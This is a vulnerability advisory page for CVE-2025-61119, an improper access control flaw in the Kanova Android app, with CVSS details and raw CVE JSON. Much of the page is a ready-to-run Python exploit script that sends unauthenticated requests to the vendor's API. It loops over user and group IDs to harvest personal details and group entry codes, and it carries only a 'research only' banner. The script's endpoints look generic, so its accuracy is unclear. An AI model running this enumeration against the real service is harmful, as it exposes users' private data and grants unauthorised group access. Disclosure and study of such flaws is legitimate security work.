Security Vulnerability Report
CVE-2025-61119 CVSS 7.5 HIGH


Published: 2025-10-30 17:15:39
Last Modified: 2026-04-15 00:35:42

Description

Kanova Android App version 1.0.27 (package name com.karelane), developed by Karely L.L.C., contains improper access control vulnerabilities. Attackers may gain unauthorized access to user details and obtain group information, including entry codes, by manipulating API request parameters. Successful exploitation could result in privacy breaches, unauthorized group access, and misuse of the platform.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Kanova Android App < 1.0.27

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import json

# CVE-2025-61119 PoC - Kanova Android App IDOR Vulnerability
# Target: Kanova Android App API endpoints
# Vulnerability: Improper Access Control / IDOR

TARGET_URL = "https://api.kanova-app.com"
VULNERABLE_USER_ENDPOINT = "/api/v1/users/{user_id}"
VULNERABLE_GROUP_ENDPOINT = "/api/v1/groups/{group_id}"


def exploit_user_info(user_id):
    """Exploit to retrieve user details by manipulating user_id parameter"""
    endpoint = VULNERABLE_USER_ENDPOINT.format(user_id=user_id)
    url = TARGET_URL + endpoint
    headers = {
        "User-Agent": "Kanova/1.0.27 Android",
        "Content-Type": "application/json",
        "Authorization": "Bearer anonymous"  # No valid auth required
    }
    try:
        response = requests.get(url, headers=headers, timeout=10)
        if response.status_code == 200:
            return response.json()
    except Exception as e:
        print(f"Error: {e}")
    return None


def exploit_group_info(group_id):
    """Exploit to retrieve group information including entry codes"""
    endpoint = VULNERABLE_GROUP_ENDPOINT.format(group_id=group_id)
    url = TARGET_URL + endpoint
    headers = {
        "User-Agent": "Kanova/1.0.27 Android",
        "Content-Type": "application/json",
        "Authorization": "Bearer anonymous"
    }
    try:
        response = requests.get(url, headers=headers, timeout=10)
        if response.status_code == 200:
            return response.json()
    except Exception as e:
        print(f"Error: {e}")
    return None


# Example usage
if __name__ == "__main__":
    # Enumerate users
    for user_id in range(1, 100):
        user_data = exploit_user_info(user_id)
        if user_data:
            print(f"User {user_id}: {json.dumps(user_data, indent=2)}")

    # Enumerate groups
    for group_id in range(1, 50):
        group_data = exploit_group_info(group_id)
        if group_data:
            print(f"Group {group_id}: {json.dumps(group_data, indent=2)}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-61119", "sourceIdentifier": "[email protected]", "published": "2025-10-30T17:15:39.123", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Kanova Android App version 1.0.27 (package name com.karelane), developed by Karely L.L.C., contains improper access control vulnerabilities. Attackers may gain unauthorized access to user details and obtain group information, including entry codes, by manipulating API request parameters. Successful exploitation could result in privacy breaches, unauthorized group access, and misuse of the platform."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "references": [{"url": "https://kar1oz.notion.site/Kanova-2629a473ecb2801bac89ce99d0b30df7", "source": "[email protected]"}]}}